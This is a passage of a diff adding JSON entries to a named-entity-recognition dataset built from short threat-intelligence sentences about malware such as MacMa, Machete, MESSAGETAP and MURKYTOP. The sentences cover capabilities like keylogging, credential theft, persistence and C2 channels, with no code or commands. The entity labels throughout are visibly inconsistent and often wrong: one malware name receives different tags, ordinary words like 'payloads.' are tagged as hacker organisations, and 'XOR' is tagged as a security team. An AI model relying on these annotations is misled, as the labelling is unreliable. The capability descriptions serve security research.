+ "the", + "ability", + "to", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "issue", + "shell", + "commands", + "to", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Lucifer", + "can", + "use", + "WMI", + "to", + "log", + "into", + "remote", + "machines", + "for", + "propagation." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Lurid", + "can", + "compress", + "data", + "before", + "sending", + "it." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lurid", + "performs", + "XOR", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "has", + "the", + "ability", + "to", + "remove", + "set", + "Registry", + "Keys,", + "including", + "those", + "used", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "an", + "infected", + "device." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "modify", + "processes", + "to", + "prevent", + "them", + "from", + "being", + "visible", + "on", + "the", + "desktop." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "upload", + "additional", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "has", + "been", + "named", + "Readme.txt", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "Base64", + "encode", + "output", + "strings", + "prior", + "to", + "sending", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "use", + "Registry", + "Run", + "Keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "use", + "scheduled", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "use", + "HTTPS", + "in", + "communication", + "with", + "C2", + "web", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MCMD", + "can", + "launch", + "a", + "console", + "process", + "(cmd.exe)", + "with", + "redirected", + "standard", + "input", + "and", + "output." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MESSAGETAP", + "has", + "XOR-encrypted", + "and", + "stored", + "contents", + "of", + "SMS", + "messages", + "that", + "matched", + "its", + "target", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MESSAGETAP", + "checks", + "two", + "files,", + "keyword_parm.txt", + "and", + "parm.txt,", + "for", + "instructions", + "on", + "how", + "to", + "target", + "and", + "save", + "data", + "parsed", + "and", + "extracted", + "from", + "SMS", + "message", + "data", + "from", + "the", + "network", + "traffic.", + "If", + "an", + "SMS", + "message", + "contained", + "either", + "a", + "phone", + "number,", + "IMSI", + "number,", + "or", + "keyword", + "that", + "matched", + "the", + "predefined", + "list,", + "it", + "is", + "saved", + "to", + "a", + "CSV", + "file", + "for", + "later", + "theft", + "by", + "the", + "threat", + "actor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "checking", + "for", + "the", + "existence", + "of", + "two", + "files,", + "keyword_parm.txt", + "and", + "parm.txt,", + "MESSAGETAP", + "XOR", + "decodes", + "and", + "read", + "the", + "contents", + "of", + "the", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "loaded", + "into", + "memory,", + "MESSAGETAP", + "deletes", + "the", + "keyword_parm.txt", + "and", + "parm.txt", + "configuration", + "files", + "from", + "disk." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MESSAGETAP", + "checks", + "for", + "the", + "existence", + "of", + "two", + "configuration", + "files", + "(keyword_parm.txt", + "and", + "parm.txt)", + "and", + "attempts", + "to", + "read", + "the", + "files", + "every", + "30", + "seconds." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MESSAGETAP", + "stored", + "targeted", + "SMS", + "messages", + "that", + "matched", + "its", + "target", + "list", + "in", + "CSV", + "files", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MESSAGETAP", + "uses", + "the", + "libpcap", + "library", + "to", + "listen", + "to", + "all", + "traffic", + "and", + "parses", + "network", + "protocols", + "starting", + "with", + "Ethernet", + "and", + "IP", + "layers.", + "It", + "continues", + "parsing", + "protocol", + "layers", + "including", + "SCTP,", + "SCCP,", + "and", + "TCAP", + "and", + "finally", + "extracts", + "SMS", + "message", + "data", + "and", + "routing", + "metadata." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "After", + "loading", + "the", + "keyword", + "and", + "phone", + "data", + "files,", + "MESSAGETAP", + "begins", + "monitoring", + "all", + "network", + "connections", + "to", + "and", + "from", + "the", + "victim", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "schedule", + "remote", + "AT", + "jobs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "delete", + "local", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "retrieve", + "information", + "about", + "users", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "scan", + "for", + "open", + "ports", + "on", + "hosts", + "in", + "a", + "connected", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "retrieve", + "information", + "about", + "shares", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "retrieve", + "information", + "about", + "groups." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "identify", + "remote", + "hosts", + "on", + "connected", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "has", + "the", + "capability", + "to", + "retrieve", + "information", + "about", + "the", + "OS." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MURKYTOP", + "uses", + "the", + "command-line", + "interface." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "the", + "ability", + "to", + "record", + "audio." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "clear", + "possible", + "malware", + "traces", + "such", + "as", + "application", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "collect", + "then", + "exfiltrate", + "files", + "from", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "decrypts", + "a", + "downloaded", + "file", + "using", + "AES-128-EBC", + "with", + "a", + "custom", + "delta." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "used", + "TLS", + "encryption", + "to", + "initialize", + "a", + "custom", + "protocol", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "exfiltrates", + "data", + "from", + "a", + "supplied", + "path", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "delete", + "itself", + "from", + "the", + "compromised", + "computer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "search", + "for", + "a", + "specific", + "file", + "on", + "the", + "compromised", + "computer", + "and", + "can", + "enumerate", + "files", + "in", + "Desktop,", + "Downloads,", + "and", + "Documents", + "folders." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "removed", + "the", + "`com.apple.quarantineattribute`", + "from", + "the", + "dropped", + "file,", + "`$TMPDIR/airportpaird`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "downloaded", + "additional", + "files,", + "including", + "an", + "exploit", + "for", + "used", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "dump", + "credentials", + "from", + "the", + "macOS", + "keychain." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "use", + "Core", + "Graphics", + "Event", + "Taps", + "to", + "intercept", + "user", + "keystrokes", + "from", + "any", + "text", + "input", + "field", + "and", + "saves", + "them", + "to", + "text", + "files.", + "Text", + "input", + "fields", + "include", + "Spotlight,", + "Finder,", + "Safari,", + "Mail,", + "Messages,", + "and", + "other", + "apps", + "that", + "have", + "text", + "fields", + "for", + "passwords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "installs", + "a", + "`com.apple.softwareupdate.plist`", + "file", + "in", + "the", + "`/LaunchAgents`", + "folder", + "with", + "the", + "`RunAtLoad`", + "value", + "set", + "to", + "`true`.", + "Upon", + "user", + "login,", + "MacMa", + "is", + "executed", + "from", + "`/var/root/.local/softwareupdate`", + "with", + "root", + "privileges.", + "Some", + "variations", + "also", + "include", + "the", + "`LimitLoadToSessionType`", + "key", + "with", + "the", + "value", + "`Aqua`,", + "ensuring", + "the", + "MacMa", + "only", + "runs", + "when", + "there", + "is", + "a", + "logged", + "in", + "GUI", + "user." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "stored", + "collected", + "files", + "locally", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "used", + "macOS", + "API", + "functions", + "to", + "perform", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "used", + "a", + "custom", + "JSON-based", + "protocol", + "for", + "its", + "C&C", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "used", + "TCP", + "port", + "5633", + "for", + "C2", + "Communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "enumerate", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "manage", + "remote", + "screen", + "sessions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "used", + "Apple’s", + "Core", + "Graphic", + "APIs,", + "such", + "as", + "`CGWindowListCreateImageFromArray`,", + "to", + "capture", + "the", + "user's", + "screen", + "and", + "open", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "collect", + "information", + "about", + "a", + "compromised", + "computer,", + "including:", + "Hardware", + "UUID,", + "Mac", + "serial", + "number,", + "macOS", + "version,", + "and", + "disk", + "sizes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "collect", + "IP", + "addresses", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "collect", + "the", + "username", + "from", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacMa", + "has", + "the", + "capability", + "to", + "create", + "and", + "modify", + "file", + "timestamps." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "MacMa", + "can", + "execute", + "supplied", + "shell", + "commands", + "and", + "uses", + "bash", + "scripts", + "to", + "perform", + "additional", + "actions." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "can", + "record", + "the", + "sounds", + "from", + "microphones", + "on", + "a", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "can", + "steal", + "clipboard", + "contents." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "deletes", + "any", + "temporary", + "files", + "it", + "creates" + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "stores", + "itself", + "in", + "<code>~/Library/.DS_Stores/</code>" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "MacSpy", + "captures", + "keystrokes." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "MacSpy", + "persists", + "via", + "a", + "Launch", + "Agent." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "uses", + "Tor", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "can", + "capture", + "screenshots", + "of", + "the", + "desktop", + "over", + "multiple", + "monitors." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "MacSpy", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "saves", + "the", + "window", + "names." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "stores", + "zipped", + "files", + "with", + "profile", + "data", + "from", + "installed", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete's", + "collected", + "data", + "is", + "encrypted", + "with", + "AES", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "TLS-encrypted", + "FTP", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "captures", + "audio", + "from", + "the", + "computer’s", + "microphone." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete’s", + "collected", + "files", + "are", + "exfiltrated", + "automatically", + "to", + "remote", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "retrieves", + "the", + "user", + "profile", + "data", + "(e.g.,", + "browsers)", + "from", + "Chrome", + "and", + "Firefox", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "hijacks", + "the", + "clipboard", + "data", + "by", + "creating", + "an", + "overlapped", + "window", + "that", + "listens", + "to", + "keyboard", + "events." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "used", + "pyobfuscate,", + "zlib", + "compression,", + "and", + "base64", + "encoding", + "for", + "obfuscation.", + "Machete", + "has", + "also", + "used", + "some", + "visual", + "obfuscation", + "techniques", + "by", + "naming", + "variables", + "as", + "combinations", + "of", + "letters", + "to", + "hinder", + "analysis." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "collects", + "stored", + "credentials", + "from", + "several", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "searches", + "the", + "File", + "system", + "for", + "files", + "of", + "interest." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "can", + "find,", + "encrypt,", + "and", + "upload", + "files", + "from", + "fixed", + "and", + "removable", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete’s", + "downloaded", + "data", + "is", + "decrypted", + "using", + "AES." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Machete's", + "collected", + "data", + "is", + "exfiltrated", + "over", + "the", + "same", + "channel", + "used", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "a", + "feature", + "to", + "copy", + "files", + "from", + "every", + "drive", + "onto", + "a", + "removable", + "drive", + "in", + "a", + "hidden", + "folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "sent", + "data", + "over", + "HTTP", + "if", + "FTP", + "failed,", + "and", + "has", + "also", + "used", + "a", + "fallback", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Once", + "a", + "file", + "is", + "uploaded,", + "Machete", + "will", + "delete", + "it", + "from", + "the", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "uses", + "FTP", + "for", + "Command", + "&", + "Control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "produces", + "file", + "listings", + "in", + "order", + "to", + "search", + "for", + "files", + "to", + "be", + "exfiltrated." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "the", + "capability", + "to", + "exfiltrate", + "stolen", + "data", + "to", + "a", + "hidden", + "folder", + "on", + "a", + "removable", + "drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "can", + "download", + "additional", + "files", + "for", + "execution", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "logs", + "keystrokes", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "stores", + "files", + "and", + "logs", + "in", + "a", + "folder", + "on", + "the", + "local", + "drive." + ], + "ner_tags": [ + "B-Idus", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "renamed", + "task", + "names", + "to", + "masquerade", + "as", + "legitimate", + "Google", + "Chrome,", + "Java,", + "Dropbox,", + "Adobe", + "Reader", + "and", + "Python", + "tasks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "B-Tool", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Machete", + "renamed", + "payloads", + "to", + "masquerade", + "as", + "legitimate", + "Google", + "Chrome,", + "Java,", + "Dropbox,", + "Adobe", + "Reader", + "and", + "Python", + "executables." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "B-Tool", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "detects", + "the", + "insertion", + "of", + "new", + "devices", + "by", + "listening", + "for", + "the", + "WM_DEVICECHANGE", + "window", + "message." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "scanned", + "and", + "looked", + "for", + "cryptographic", + "keys", + "and", + "certificate", + "file", + "extensions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "has", + "a", + "component", + "to", + "check", + "for", + "running", + "processes", + "to", + "look", + "for", + "web", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Machete", + "is", + "written", + "in", + "Python", + "and", + "is", + "used", + "in", + "conjunction", + "with", + "additional", + "Python", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "used", + "the", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "different", + "components", + "of", + "Machete", + "are", + "executed", + "by", + "Windows", + "Task", + "Scheduler." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Machete", + "sends", + "stolen", + "data", + 